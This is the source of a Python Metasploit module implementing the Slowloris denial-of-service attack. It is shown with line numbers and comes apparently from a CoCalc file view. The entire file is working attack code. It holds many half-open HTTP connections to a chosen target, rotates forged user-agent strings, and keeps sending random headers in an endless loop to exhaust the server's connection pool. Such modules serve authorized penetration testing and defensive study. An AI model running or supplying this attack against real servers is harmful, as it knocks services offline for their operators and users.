CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

1
#!/usr/bin/env python3
2

3
import random
4
import socket
5
import ssl
6
import string
7
import time
8

9
from metasploit import module
10

11
metadata = {
12
    'name': 'Slowloris Denial of Service Attack',
13
    'description': '''
14
        Slowloris tries to keep many connections to the target web server open and hold them open as long as possible.
15
        It accomplishes this by opening connections to the target web server and sending a partial request.
16
        Periodically, it will send subsequent HTTP headers, adding to-but never completing-the request.
17
        Affected servers will keep these connections open, filling their maximum concurrent connection pool,
18
        eventually denying additional connection attempts from clients.
19
     ''',
20
    'authors': [
21
        'RSnake',  # Vulnerability disclosure
22
        'Gokberk Yaltirakli',  # Simple slowloris in Python
23
        'Daniel Teixeira',  # Metasploit module (Ruby)
24
        'Matthew Kienow <matthew_kienow[AT]rapid7.com>'  # Metasploit external module (Python)
25
    ],
26
    'date': '2009-06-17',
27
    'references': [
28
        {'type': 'cve', 'ref': '2007-6750'},
29
        {'type': 'cve', 'ref': '2010-2227'},
30
        {'type': 'edb', 'ref': '8976'},
31
        {'type': 'url', 'ref': 'https://github.com/gkbrk/slowloris'}
32
     ],
33
    'type': 'dos',
34
    'options': {
35
        'rhost': {'type': 'address', 'description': 'The target address', 'required': True, 'default': None},
36
        'rport': {'type': 'port', 'description': 'The target port', 'required': True, 'default': 80},
37
        'sockets': {'type': 'int', 'description': 'The number of sockets to use in the attack', 'required': True, 'default': 150},
38
        'delay': {'type': 'int', 'description': 'The delay between sending keep-alive headers', 'required': True, 'default': 15},
39
        'ssl': {'type': 'bool', 'description': 'Negotiate SSL/TLS for outgoing connections', 'required': True, 'default': False},
40
        'rand_user_agent': {'type': 'bool', 'description': 'Randomizes user-agent with each request', 'required': True, 'default': True}
41
     }}
42

43
list_of_sockets = []
44
user_agents = [
45
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
46
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
47
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50",
48
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0",
49
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
50
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
51
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
52
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14",
53
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50",
54
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393",
55
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
56
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
57
    "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
58
    "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
59
    "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0",
60
    "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
61
    "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
62
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
63
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
64
    "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0",
65
    "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
66
    "Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0",
67
    "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
68
    "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
69
    "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0",
70
]
71

72

73
def create_random_header_name(size=8, seq=string.ascii_uppercase + string.ascii_lowercase):
74
    return ''.join(random.choice(seq) for _ in range(size))
75

76

77
def init_socket(host, port, use_ssl=False, rand_user_agent=True):
78
    s = socket.create_connection((host, port), 10)
79
    s.settimeout(4)
80

81
    if use_ssl:
82
        s = ssl.wrap_socket(s)
83

84
    s.send("GET /?{} HTTP/1.1\r\n".format(random.randint(0, 2000)).encode("utf-8"))
85

86
    if rand_user_agent:
87
        s.send("User-Agent: {}\r\n".format(random.choice(user_agents)).encode("utf-8"))
88
    else:
89
        s.send("User-Agent: {}\r\n".format(user_agents[0]).encode("utf-8"))
90

91
    s.send("{}\r\n".format("Accept-language: en-US,en,q=0.5").encode("utf-8"))
92
    return s
93

94

95
def run(args):
96
    host = args['rhost']
97
    port = int(args['rport'])
98
    use_ssl = args['ssl'] == "true"
99
    rand_user_agent = args['rand_user_agent'] == "true"
100
    socket_count = int(args['sockets'])
101
    delay = int(args['delay'])
102

103
    module.log("Attacking %s with %s sockets" % (host, socket_count), 'info')
104

105
    module.log("Creating sockets...", 'info')
106
    for i in range(socket_count):
107
        try:
108
            module.log("Creating socket number %s" % i, 'debug')
109
            s = init_socket(host, port, use_ssl=use_ssl, rand_user_agent=rand_user_agent)
110
        except socket.error:
111
            break
112
        list_of_sockets.append(s)
113

114
    while True:
115
        module.log("Sending keep-alive headers... Socket count: %s" % len(list_of_sockets), 'info')
116
        for s in list(list_of_sockets):
117
            try:
118
                s.send("{}: {}\r\n".format(create_random_header_name(random.randint(8, 16)),
119
                                           random.randint(1, 5000)).encode("utf-8"))
120

121
            except socket.error:
122
                list_of_sockets.remove(s)
123

124
        for _ in range(socket_count - len(list_of_sockets)):
125
            module.log("Recreating socket...", 'debug')
126
            try:
127
                s = init_socket(host, port, use_ssl=use_ssl, rand_user_agent=rand_user_agent)
128
                if s:
129
                    list_of_sockets.append(s)
130
            except socket.error:
131
                break
132
        time.sleep(delay)
133

134

135
if __name__ == "__main__":
136
    module.run(metadata, run)
137

138